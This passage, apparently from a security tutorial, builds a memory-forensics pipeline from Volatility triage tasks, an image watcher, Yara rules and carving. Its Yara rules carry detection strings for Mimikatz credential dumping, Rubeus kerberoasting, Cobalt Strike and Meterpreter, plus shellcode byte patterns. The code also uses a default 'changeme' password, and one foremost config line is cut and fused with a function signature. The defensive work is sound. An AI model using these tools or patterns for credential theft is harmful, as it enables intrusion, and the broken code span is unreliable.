\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        processes = run_vol(image_path, 'windows.pslist')\n        suspicious_procs = []\n        proc_records = []\n\n        # Known suspicious parent-child relationships\n        suspicious_pairs = {\n            ('winword.exe', 'cmd.exe'), ('winword.exe', 'powershell.exe'),\n            ('excel.exe',   'cmd.exe'), ('excel.exe',   'powershell.exe'),\n            ('outlook.exe', 'cmd.exe'), ('outlook.exe', 'powershell.exe'),\n        }\n\n        pid_to_name = {}\n        for proc in processes:\n            name = (proc.get('ImageFileName') or proc.get('Name') or '').lower()\n            pid  = proc.get('PID') or proc.get('Pid', 0)\n            ppid = proc.get('PPID') or proc.get('PPid', 0)\n            pid_to_name[pid] = name\n\n        for proc in processes:\n            name  = (proc.get('ImageFileName') or proc.get('Name') or '').lower()\n            pid   = proc.get('PID') or proc.get('Pid', 0)\n            ppid  = proc.get('PPID') or proc.get('PPid', 0)\n            path  = proc.get('Path') or proc.get('Exe') or ''\n            is_suspicious = False\n            reason = []\n\n            # Check parent-child anomalies\n            parent_name = pid_to_name.get(ppid, '')\n            if (parent_name, name) in suspicious_pairs:\n                is_suspicious = True\n                reason.append(f\"Suspicious parent: {parent_name} spawned {name}\")\n\n            # Check for masquerading (svchost outside System32)\n            if name in ['svchost.exe', 'lsass.exe', 'csrss.exe', 'winlogon.exe']:\n                if path and 'system32' not in path.lower():\n                    is_suspicious = True\n                    reason.append(f\"System process outside System32: {path}\")\n\n            if is_suspicious:\n                suspicious_procs.append(pid)\n\n            proc_records.append((\n                image_id, pid, ppid, name, path,\n                proc.get('CmdLine') or proc.get('CommandLine') or '',\n                is_suspicious, ', '.join(reason) if reason else None\n            ))\n\n        # Bulk insert processes\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                execute_values(cur, \"\"\"\n                    INSERT INTO process_list\n                        (image_id, pid, ppid, name, path, cmd_line, is_suspicious, suspicious_reason)\n                    VALUES %s\n                \"\"\", proc_records)\n            conn.commit()\n\n        # \u2500\u2500 Network connections \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        connections = run_vol(image_path, 'windows.netscan')\n        conn_records = []\n        suspicious_ports = {4444, 8080, 8443, 1337, 31337, 443, 80}\n        internal_ranges  = ['10.', '172.16.', '172.17.', '172.18.', '192.168.']\n\n        for c in connections:\n            remote = c.get('ForeignAddr') or c.get('RemoteAddr') or ''\n            rport  = c.get('ForeignPort') or c.get('RemotePort') or 0\n            pid    = c.get('PID') or c.get('Pid') or 0\n            is_sus = (\n                pid in suspicious_procs and\n                not any(remote.startswith(r) for r in internal_ranges)\n            )\n            conn_records.append((\n                image_id, pid,\n                c.get('ImageFileName') or c.get('Owner') or '',\n                c.get('LocalAddr') or '', c.get('LocalPort') or 0,\n                remote, rport,\n                c.get('State') or '',\n                is_sus\n            ))\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                execute_values(cur, \"\"\"\n                    INSERT INTO network_connections\n                        (image_id, pid, process_name, local_addr, local_port,\n                         remote_addr, remote_port, state, is_suspicious)\n                    VALUES %s\n                \"\"\", conn_records)\n            conn.commit()\n\n        # \u2500\u2500 Triage summary \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        risk_score = (\n            len(suspicious_procs) * 10 +\n            sum(1 for c in conn_records if c[-1]) * 5\n        )\n\n        summary = {\n            'process_count':        len(proc_records),\n            'suspicious_processes': len(suspicious_procs),\n            'network_connections':  len(conn_records),\n            'risk_score':           risk_score,\n        }\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    INSERT INTO triage_results\n                        (image_id, process_count, network_conn_count,\n                         suspicious_process_count, risk_score, triage_summary)\n                    VALUES (%s, %s, %s, %s, %s, %s)\n                \"\"\", (image_id, len(proc_records), len(conn_records),\n                      len(suspicious_procs), risk_score, Json(summary)))\n                cur.execute(\n                    \"UPDATE memory_images SET status='triage_complete' WHERE id=%s\",\n                    (image_id,)\n                )\n            conn.commit()\n\n        log.info(f\"Triage complete for {hostname}: risk_score={risk_score}\")\n        # Always run deep analysis; priority queue handles ordering\n        run_deep_analysis.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Triage failed for image {image_id}: {exc}\")\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='triage_failed' WHERE id=%s\", (image_id,))\n            conn.commit()\n        raise self.retry(exc=exc, countdown=120)\n\n@app.task(bind=True, max_retries=2)\ndef run_deep_analysis(self, image_id: int) -&gt; int:\n    \"\"\"Stage 3: Deep analysis - malfind, callbacks, handles, Yara scanning.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path, hostname FROM memory_images WHERE id = %s\", (image_id,))\n                image_path, hostname = cur.fetchone()\n\n        log.info(f\"Starting deep analysis for {hostname} (image {image_id})\")\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='deep_running' WHERE id=%s\", (image_id,))\n            conn.commit()\n\n        # \u2500\u2500 Malfind \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        malfind_results = run_vol(image_path, 'windows.malfind')\n        malfind_records = []\n\n        for region in malfind_results:\n            pid        = region.get('PID') or region.get('Pid') or 0\n            name       = region.get('Process') or region.get('ImageFileName') or ''\n            protection = region.get('Protection') or ''\n            vad_start  = region.get('Start') or 0\n            vad_end    = region.get('End') or 0\n\n            # Check for PE header (MZ)\n            hexdata    = region.get('Hexdump') or region.get('Data') or ''\n            has_pe     = hexdata.startswith('4d 5a') or 'MZ' in str(hexdata)\n\n            # Estimate entropy from hex data (rough)\n            entropy    = 6.5  # placeholder - real calculation needs binary read\n\n            # Determine risk\n            if 'EXECUTE_READ_WRITE' in protection and has_pe:\n                risk = 'CRITICAL'\n            elif 'EXECUTE_READ_WRITE' in protection:\n                risk = 'HIGH'\n            else:\n                risk = 'MEDIUM'\n\n            malfind_records.append((\n                image_id, pid, name,\n                vad_start, vad_end, protection,\n                has_pe, entropy, None, risk\n            ))\n\n        if malfind_records:\n            with get_db() as conn:\n                with conn.cursor() as cur:\n                    execute_values(cur, \"\"\"\n                        INSERT INTO malfind_results\n                            (image_id, pid, process_name, vad_start, vad_end,\n                             protection, has_pe_header, entropy, yara_matches, risk_level)\n                        VALUES %s\n                    \"\"\", malfind_records)\n                conn.commit()\n\n        has_malfind = len(malfind_records) &gt; 0\n\n        # \u2500\u2500 Yara scanning of process memory \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        if Path(YARA_RULES).exists():\n            yara_results = run_vol(image_path, 'windows.vadyarascan',\n                                   ['--yara-file', YARA_RULES])\n            for match in yara_results:\n                log.warning(f\"YARA HIT on {hostname}: Rule={match.get('Rule')} \"\n                            f\"PID={match.get('PID')} Process={match.get('Process')}\")\n\n        # \u2500\u2500 Kernel callbacks \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        callbacks = run_vol(image_path, 'windows.callbacks')\n        if callbacks:\n            log.info(f\"  Callbacks found: {len(callbacks)}\")\n\n        # Update triage results with malfind flag\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    UPDATE triage_results\n                    SET has_malfind = %s\n                    WHERE image_id = %s\n                \"\"\", (has_malfind, image_id))\n                cur.execute(\n                    \"UPDATE memory_images SET status='deep_complete' WHERE id=%s\",\n                    (image_id,)\n                )\n            conn.commit()\n\n        log.info(f\"Deep analysis complete for {hostname}: \"\n                 f\"{len(malfind_records)} malfind regions\")\n\n        extract_iocs.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Deep analysis failed for image {image_id}: {exc}\")\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='deep_failed' WHERE id=%s\", (image_id,))\n            conn.commit()\n        raise self.retry(exc=exc, countdown=180)\n\n@app.task(bind=True)\ndef extract_iocs(self, image_id: int) -&gt; int:\n    \"\"\"Stage 4: Extract and enrich IOCs from analysis results.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path, hostname FROM memory_images WHERE id = %s\", (image_id,))\n                image_path, hostname = cur.fetchone()\n\n        log.info(f\"Extracting IOCs for {hostname} (image {image_id})\")\n        ioc_records = []\n\n        # Extract IP addresses from network connections\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    SELECT DISTINCT remote_addr, remote_port, pid, process_name\n                    FROM network_connections\n                    WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'\n                \"\"\", (image_id,))\n                for row in cur.fetchall():\n                    remote_addr, port, pid, pname = row\n                    # Filter RFC1918 addresses - external IPs are more interesting\n                    if not any(remote_addr.startswith(r) for r in\n                               ['10.', '172.16.', '192.168.', '127.', '0.']):\n                        ioc_records.append((\n                            image_id, 'ip_address', remote_addr,\n                            pid, pname, 'medium', 'netscan'\n                        ))\n\n        # Extract strings from malfind regions (URLs, domains, hashes)\n        # Run strings against each malfind region via bulk_extractor\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    SELECT pid, vad_start, vad_end, process_name\n                    FROM malfind_results\n                    WHERE image_id = %s AND risk_level IN ('CRITICAL','HIGH')\n                    LIMIT 20\n                \"\"\", (image_id,))\n                high_risk_regions = cur.fetchall()\n\n        # Use Volatility strings plugin for URL extraction from memory\n        strings_result = subprocess.run([\n            VOL_CMD, '-f', image_path, '--renderer', 'json',\n            'windows.strings', '--pid',\n            ','.join(str(r[0]) for r in high_risk_regions) if high_risk_regions else '0'\n        ], capture_output=True, text=True, timeout=300)\n\n        # Extract URLs and domains from strings output\n        url_pattern    = re.compile(r'https?:\/\/[a-zA-Z0-9.\/_?=&amp;-]{10,200}')\n        domain_pattern = re.compile(r'\\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\\.)+[a-z]{2,}\\b')\n\n        for url in url_pattern.findall(strings_result.stdout):\n            if not any(legit in url for legit in\n                       ['microsoft.com', 'windows.com', 'windowsupdate.com']):\n                ioc_records.append((image_id, 'url', url, None, None, 'medium', 'strings'))\n\n        if ioc_records:\n            with get_db() as conn:\n                with conn.cursor() as cur:\n                    execute_values(cur, \"\"\"\n                        INSERT INTO iocs_extracted\n                            (image_id, ioc_type, ioc_value, pid, process_name,\n                             confidence, source_plugin)\n                        VALUES %s\n                        ON CONFLICT DO NOTHING\n                    \"\"\", ioc_records)\n                conn.commit()\n\n        log.info(f\"IOC extraction complete for {hostname}: {len(ioc_records)} IOCs\")\n        generate_report.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"IOC extraction failed for image {image_id}: {exc}\")\n        raise\n\n@app.task(bind=True)\ndef generate_report(self, image_id: int) -&gt; int:\n    \"\"\"Stage 5: Generate analyst-ready HTML and JSON reports.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                # Gather all results\n                cur.execute(\"\"\"\n                    SELECT m.hostname, m.image_path, m.image_size_gb, m.sha256,\n                           m.acquired_at, m.os_version, m.tier,\n                           t.process_count, t.network_conn_count,\n                           t.suspicious_process_count, t.risk_score, t.has_malfind\n                    FROM memory_images m\n                    LEFT JOIN triage_results t ON t.image_id = m.id\n                    WHERE m.id = %s\n                \"\"\", (image_id,))\n                meta = cur.fetchone()\n\n                cur.execute(\"\"\"\n                    SELECT pid, ppid, name, path, cmd_line, suspicious_reason\n                    FROM process_list WHERE image_id = %s AND is_suspicious = TRUE\n                \"\"\", (image_id,))\n                suspicious_procs = cur.fetchall()\n\n                cur.execute(\"\"\"\n                    SELECT process_name, remote_addr, remote_port, state\n                    FROM network_connections WHERE image_id = %s AND is_suspicious = TRUE\n                \"\"\", (image_id,))\n                suspicious_conns = cur.fetchall()\n\n                cur.execute(\"\"\"\n                    SELECT pid, process_name, protection, has_pe_header, entropy, risk_level\n                    FROM malfind_results WHERE image_id = %s\n                    ORDER BY risk_level\n                \"\"\", (image_id,))\n                malfind = cur.fetchall()\n\n                cur.execute(\"\"\"\n                    SELECT ioc_type, ioc_value, process_name, confidence\n                    FROM iocs_extracted WHERE image_id = %s\n                \"\"\", (image_id,))\n                iocs = cur.fetchall()\n\n        hostname   = meta[0]\n        risk_score = meta[10]\n        risk_label = (\n            'CRITICAL' if risk_score &gt;= 50 else\n            'HIGH'     if risk_score &gt;= 20 else\n            'MEDIUM'   if risk_score &gt;= 5  else\n            'LOW'\n        )\n\n        # JSON report\n        report_data = {\n            'hostname':          hostname,\n            'image_id':          image_id,\n            'risk_score':        risk_score,\n            'risk_label':        risk_label,\n            'has_malfind':       meta[11],\n            'suspicious_procs':  len(suspicious_procs),\n            'suspicious_conns':  len(suspicious_conns),\n            'ioc_count':         len(iocs),\n            'iocs':              [{'type': i[0], 'value': i[1], 'process': i[2]} for i in iocs],\n            'malfind_regions':   [\n                {'pid': m[0], 'process': m[1], 'protection': m[2],\n                 'has_pe': m[3], 'risk': m[5]}\n                for m in malfind\n            ],\n        }\n\n        report_dir  = Path(f'\/srv\/memory\/reports\/{hostname}')\n        report_dir.mkdir(parents=True, exist_ok=True)\n\n        json_path = report_dir \/ f'report_{image_id}.json'\n        with open(json_path, 'w') as f:\n            json.dump(report_data, f, indent=2, default=str)\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\n                    \"UPDATE memory_images SET status='complete' WHERE id=%s\",\n                    (image_id,)\n                )\n            conn.commit()\n\n        log.info(f\"Report generated for {hostname}: risk={risk_label} ({risk_score})\")\n        if risk_label in ('CRITICAL', 'HIGH'):\n            log.warning(f\"HIGH PRIORITY: {hostname} requires immediate analyst review\")\n\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Report generation failed for image {image_id}: {exc}\")\n        raise<\/pre>\n<h3>The image watcher: automatically triggering the pipeline<\/h3>\n<p>The pipeline tasks need to be triggered automatically when a new memory image lands in the collection directory. A filesystem watcher daemon monitors the landing zone and starts the processing chain as soon as an image file is detected and is not still being written.<\/p>\n<pre>## image_watcher.py - Filesystem watcher for automatic pipeline triggering\n\n#!\/usr\/bin\/env python3\n\"\"\"\nWatches the Velociraptor upload directory for new memory images.\nAutomatically triggers the processing pipeline when a new image lands.\n\"\"\"\n\nimport time\nimport os\nimport re\nimport logging\nimport psycopg2\nfrom pathlib import Path\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n# pip install watchdog\nfrom pipeline import validate_image  # Import Celery task\n\nlogging.basicConfig(\n    level=logging.INFO,\n    format='%(asctime)s [%(levelname)s] %(message)s',\n    handlers=[\n        logging.FileHandler('\/srv\/memory\/logs\/watcher.log'),\n        logging.StreamHandler()\n    ]\n)\nlog = logging.getLogger(__name__)\n\nWATCH_DIR   = '\/srv\/memory\/landing'\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\n\n# Pattern matching Velociraptor-uploaded memory images\n# Format: hostname_timestamp.raw or hostname_timestamp.zip\nIMAGE_PATTERN = re.compile(r'^([a-zA-Z0-9_-]+)_(\\d+)\\.(raw|zip|dmp)$')\n\nclass MemoryImageHandler(FileSystemEventHandler):\n    def __init__(self):\n        self.processing = set()\n\n    def on_closed(self, event):\n        \"\"\"Triggered when a file write is complete (file handle closed).\"\"\"\n        if event.is_directory:\n            return\n        self._handle_new_file(event.src_path)\n\n    def on_created(self, event):\n        \"\"\"Fallback for systems where on_closed is not supported.\"\"\"\n        if event.is_directory:\n            return\n        # Wait briefly and check if file is still being written\n        time.sleep(5)\n        path = Path(event.src_path)\n        if not path.exists():\n            return\n        # Check file is not growing (transfer complete)\n        size1 = path.stat().st_size\n        time.sleep(10)\n        size2 = path.stat().st_size\n        if size1 == size2:\n            self._handle_new_file(event.src_path)\n\n    def _handle_new_file(self, filepath: str):\n        path = Path(filepath)\n        if path.name in self.processing:\n            return\n\n        match = IMAGE_PATTERN.match(path.name)\n        if not match:\n            return\n\n        hostname  = match.group(1)\n        timestamp = match.group(2)\n\n        log.info(f\"New image detected: {path.name} from {hostname}\")\n        self.processing.add(path.name)\n\n        try:\n            # Register in database\n            with psycopg2.connect(POSTGRES_URL) as conn:\n                with conn.cursor() as cur:\n                    cur.execute(\"\"\"\n                        INSERT INTO memory_images (hostname, image_path, status)\n                        VALUES (%s, %s, 'received')\n                        ON CONFLICT DO NOTHING\n                        RETURNING id\n                    \"\"\", (hostname, str(path)))\n                    row = cur.fetchone()\n                conn.commit()\n\n            if row:\n                image_id = row[0]\n                log.info(f\"Registered image {image_id} for {hostname}, starting pipeline\")\n                # Kick off the pipeline\n                validate_image.delay(image_id)\n            else:\n                log.warning(f\"Image already registered: {path.name}\")\n\n        except Exception as e:\n            log.error(f\"Failed to register {path.name}: {e}\")\n            self.processing.discard(path.name)\n\ndef main():\n    log.info(f\"Starting image watcher on {WATCH_DIR}\")\n    Path(WATCH_DIR).mkdir(parents=True, exist_ok=True)\n\n    handler  = MemoryImageHandler()\n    observer = Observer()\n    observer.schedule(handler, WATCH_DIR, recursive=False)\n    observer.start()\n\n    log.info(\"Watcher running. Press Ctrl+C to stop.\")\n    try:\n        while True:\n            time.sleep(1)\n    except KeyboardInterrupt:\n        observer.stop()\n    observer.join()\n\nif __name__ == '__main__':\n    main()<\/pre>\n<h3>Systemd service for the watcher<\/h3>\n<pre>## \/etc\/systemd\/system\/memory-watcher.service\n\n[Unit]\nDescription=Memory Image Pipeline Watcher\nAfter=network.target docker.service redis.service postgresql.service\nRequires=docker.service\n\n[Service]\nType=simple\nUser=analyst\nWorkingDirectory=\/srv\/memory\nExecStart=\/opt\/vol3-env\/bin\/python3 \/srv\/memory\/image_watcher.py\nRestart=always\nRestartSec=10\nStandardOutput=append:\/srv\/memory\/logs\/watcher.log\nStandardError=append:\/srv\/memory\/logs\/watcher.log\nEnvironment=POSTGRES_URL=postgresql:\/\/analyst:changeme@localhost\/memory_analysis\nEnvironment=CELERY_BROKER_URL=redis:\/\/localhost:6379\/0\n\n[Install]\nWantedBy=multi-user.target<\/pre>\n<pre>## Enable and start the watcher\nsystemctl daemon-reload\nsystemctl enable memory-watcher\nsystemctl start memory-watcher\nsystemctl status memory-watcher<\/pre>\n<h3>Building a Yara ruleset for memory scanning<\/h3>\n<p>Yara rules are the primary mechanism for identifying known malware families and attacker tooling in memory images. The pipeline already calls <code>windows.vadyarascan<\/code> against each image, but the ruleset it scans against needs to be maintained and compiled correctly to be useful. A poorly maintained Yara ruleset either generates excessive false positives that slow investigation or misses known malware because rules have not been updated. This section covers building a ruleset specifically for memory scanning rather than file scanning, which has different considerations.<\/p>\n<p>Memory scanning Yara rules differ from file scanning rules in two important ways. First, you cannot rely on file-level indicators like filesize or hash since you are scanning a memory region, not a file. Second, strings appear decoded in memory even if they were encrypted or obfuscated on disk, which means memory rules can be simpler and more reliable than their file-based equivalents for many malware families.<\/p>\n<pre>## Yara rule structure for memory scanning\n## Save to \/srv\/memory\/yara_rules\/\n\n# rules\/cobalt_strike.yar\nrule CobaltStrike_Beacon_Config_Decoded {\n    meta:\n        description = \"Detects decoded Cobalt Strike beacon configuration in memory\"\n        author      = \"justruss\"\n        date        = \"2026-01-01\"\n        confidence  = \"high\"\n    strings:\n        \/\/ BeaconType field prefix in decoded config\n        $beacon_cfg  = { 00 01 00 01 00 00 00 ?? }\n        \/\/ Common C2 URI patterns in decoded beacon memory\n        $uri_pattern = \"\/updates\" ascii wide\n        $uri_cdn     = \"\/CDN\/\" ascii wide\n        \/\/ Sleep mask pattern common across CS versions\n        $sleep_mask  = { C7 44 24 ?? 01 00 00 00 }\n        \/\/ Reflective loader signature\n        $ref_loader  = \"ReflectiveLoader\" ascii\n    condition:\n        ($ref_loader and 1 of ($uri_pattern, $uri_cdn))\n        or ($beacon_cfg and $sleep_mask)\n}\n\nrule CobaltStrike_SMB_Beacon {\n    meta:\n        description = \"Detects Cobalt Strike SMB named pipe beacon in memory\"\n    strings:\n        $pipe_msse   = \"\\\\\\\\.\\\\pipe\\\\MSSE-\" wide ascii\n        $pipe_postex = \"\\\\\\\\.\\\\pipe\\\\postex_\" wide ascii\n        $pipe_msagnt = \"\\\\\\\\.\\\\pipe\\\\msagent_\" wide ascii\n        $pipe_status = \"\\\\\\\\.\\\\pipe\\\\status_\" wide ascii\n    condition:\n        any of them\n}\n\n# rules\/meterpreter.yar\nrule Meterpreter_Reflective_DLL {\n    meta:\n        description = \"Detects Meterpreter reflective DLL in process memory\"\n    strings:\n        $mz           = { 4D 5A }\n        $ref_loader   = \"ReflectiveLoader\" ascii\n        $meterpreter  = \"meterpreter\" ascii nocase\n        $stdapi       = \"stdapi_\" ascii\n        $priv         = \"priv_elevate\" ascii\n    condition:\n        $mz at 0 and $ref_loader and 1 of ($meterpreter, $stdapi, $priv)\n}\n\n# rules\/credential_tools.yar\nrule Mimikatz_In_Memory {\n    meta:\n        description = \"Detects Mimikatz variants loaded in process memory\"\n    strings:\n        $mimikatz1  = \"mimikatz\" ascii wide nocase\n        $mimikatz2  = \"sekurlsa::\" ascii wide\n        $mimikatz3  = \"lsadump::\" ascii wide\n        $mimikatz4  = \"kerberos::\" ascii wide\n        $mimikatz5  = \"privilege::debug\" ascii wide\n        $wdigest    = \"wdigest.dll\" ascii wide\n        $lsasrv     = \"lsasrv.dll\" ascii wide\n    condition:\n        2 of ($mimikatz1, $mimikatz2, $mimikatz3, $mimikatz4, $mimikatz5)\n        or ($wdigest and $lsasrv and 1 of ($mimikatz1, $mimikatz2))\n}\n\nrule Rubeus_Kerberos_Tool {\n    meta:\n        description = \"Detects Rubeus .NET Kerberos toolkit in memory\"\n    strings:\n        $rubeus1  = \"Rubeus\" ascii wide\n        $asktgt   = \"asktgt\" ascii wide\n        $kerberos = \"kerberoast\" ascii wide nocase\n        $asreproast = \"asreproast\" ascii wide nocase\n        $s4u      = \"s4u\" ascii wide\n    condition:\n        $rubeus1 and 2 of ($asktgt, $kerberos, $asreproast, $s4u)\n}\n\n# rules\/generic_suspicious.yar\nrule RWX_PE_In_Anonymous_Memory {\n    meta:\n        description = \"PE header in executable anonymous memory - reflective loading\"\n        confidence  = \"medium\"\n    strings:\n        $mz  = { 4D 5A 90 00 }\n        $pe  = { 50 45 00 00 }\n    condition:\n        $mz at 0 and $pe\n}\n\nrule Shellcode_Common_Preambles {\n    meta:\n        description = \"Common shellcode entry patterns in executable memory\"\n    strings:\n        \/\/ x64 NOP sled into shellcode\n        $nop_sled   = { 90 90 90 90 90 90 90 90 FC 48 83 E4 F0 }\n        \/\/ Common x64 shellcode prologue\n        $x64_prolog = { FC 48 83 E4 F0 E8 C? 00 00 00 }\n        \/\/ Common WinExec shellcode pattern\n        $winexec    = { 6A 01 68 63 6D 64 00 }\n    condition:\n        any of them\n}<\/pre>\n<pre>## Yara rule compilation and management script\n## Run regularly to rebuild the combined ruleset\n\n#!\/usr\/bin\/env python3\n\"\"\"\nCompiles individual Yara rule files into a single compiled ruleset.\nValidates rules before compilation to catch syntax errors.\nTests against known-clean samples to check for false positives.\n\"\"\"\n\nimport yara\nimport os\nimport json\nimport logging\nfrom pathlib import Path\nfrom datetime import datetime\n\nlog = logging.getLogger(__name__)\n\nRULES_DIR    = Path('\/srv\/memory\/yara_rules\/rules')\nCOMPILED_OUT = Path('\/srv\/memory\/yara_rules\/combined.yar')\nCLEAN_SAMPLES = Path('\/srv\/memory\/yara_rules\/clean_samples')\n\ndef compile_ruleset() -&gt; bool:\n    \"\"\"Compile all .yar files into a single combined ruleset.\"\"\"\n    rule_files = {}\n    errors = []\n\n    for yar_file in sorted(RULES_DIR.glob('*.yar')):\n        namespace = yar_file.stem\n        try:\n            # Test compile individually first\n            yara.compile(filepath=str(yar_file))\n            rule_files[namespace] = str(yar_file)\n            log.info(f\"  OK: {yar_file.name}\")\n        except yara.SyntaxError as e:\n            log.error(f\"  SYNTAX ERROR in {yar_file.name}: {e}\")\n            errors.append(str(yar_file.name))\n\n    if errors:\n        log.error(f\"Compilation aborted: {len(errors)} files have syntax errors\")\n        return False\n\n    # Compile combined ruleset\n    try:\n        combined = yara.compile(filepaths=rule_files)\n        combined.save(str(COMPILED_OUT))\n        log.info(f\"Combined ruleset saved: {COMPILED_OUT}\")\n        log.info(f\"Total rules compiled: {len(rule_files)} files\")\n        return True\n    except Exception as e:\n        log.error(f\"Combined compilation failed: {e}\")\n        return False\n\ndef test_against_clean_samples(compiled_path: str) -&gt; int:\n    \"\"\"Test compiled ruleset against clean samples. Returns false positive count.\"\"\"\n    if not CLEAN_SAMPLES.exists():\n        log.warning(\"No clean samples directory - skipping false positive test\")\n        return 0\n\n    rules = yara.load(compiled_path)\n    fp_count = 0\n\n    for sample in CLEAN_SAMPLES.glob('*'):\n        if sample.is_file():\n            matches = rules.match(str(sample))\n            if matches:\n                log.warning(f\"FALSE POSITIVE: {sample.name} matched {[m.rule for m in matches]}\")\n                fp_count += 1\n\n    log.info(f\"False positive check: {fp_count} hits in clean samples\")\n    return fp_count\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO,\n                        format='%(asctime)s [%(levelname)s] %(message)s')\n    log.info(f\"Compiling Yara ruleset from {RULES_DIR}\")\n    if compile_ruleset():\n        fps = test_against_clean_samples(str(COMPILED_OUT))\n        if fps &gt; 5:\n            log.warning(f\"High false positive count ({fps}) - review rules before use\")\n        else:\n            log.info(\"Ruleset ready for deployment\")\n    else:\n        log.error(\"Ruleset compilation failed - keeping previous version\")<\/pre>\n<h3>Memory carving: recovering deleted files and artefacts<\/h3>\n<p>Memory carving is distinct from Volatility plugin analysis. Where Volatility works with the structured data in a memory image (process tables, VAD trees, network structures), carving treats the image as a raw byte stream and searches for known file signatures. This recovers files that were loaded into memory and may no longer be accessible through normal OS structures: documents opened and closed before the image was taken, executables that were loaded and unmapped, scripts that ran entirely in memory, and configuration files that were decrypted and used.<\/p>\n<pre>## Automated memory carving pipeline stage\n## Integrates with the main Celery pipeline\n\n#!\/usr\/bin\/env python3\n\"\"\"\nMemory carving using bulk_extractor and foremost against memory images.\nFocuses on security-relevant carving: executables, scripts, documents, certificates.\n\"\"\"\n\nimport subprocess\nimport shutil\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import List, Dict\n\nlog = logging.getLogger(__name__)\n\n# File types to carve - focused on security-relevant artefacts\nFOREMOST_CONFIG = \"\"\"\n# Foremost config for memory forensics\n# Focus on executable and document types\n\n# Windows executables\nexe y 4000000 \\x4d\\x5a\n\n# DLL files (same signature as exe but worth carving separately)\ndll y 4000000 \\x4d\\x5a\n\n# PowerShell scripts (XML-based)\nps1 y 100000  Dict:\n    \"\"\"Run bulk_extractor and foremost against a memory image.\"\"\"\n\n    output_path = Path(output_dir) \/ f'carved_{image_id}'\n    output_path.mkdir(parents=True, exist_ok=True)\n\n    results = {\n        'image_id':        image_id,\n        'carved_files':    {},\n        'bulk_extractor':  {},\n        'interesting':     [],\n    }\n\n    # \u2500\u2500 bulk_extractor: extracts structured data \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    # Much faster than foremost for structured extraction\n    bulk_out = output_path \/ 'bulk_extractor'\n    bulk_out.mkdir(exist_ok=True)\n\n    log.info(f\"Running bulk_extractor on image {image_id}\")\n    result = subprocess.run([\n        'bulk_extractor',\n        '-o', str(bulk_out),\n        # Scanners relevant to security investigations\n        '-e', 'email',      # Email addresses\n        '-e', 'url',        # URLs\n        '-e', 'domain',     # Domain names\n        '-e', 'ip',         # IP 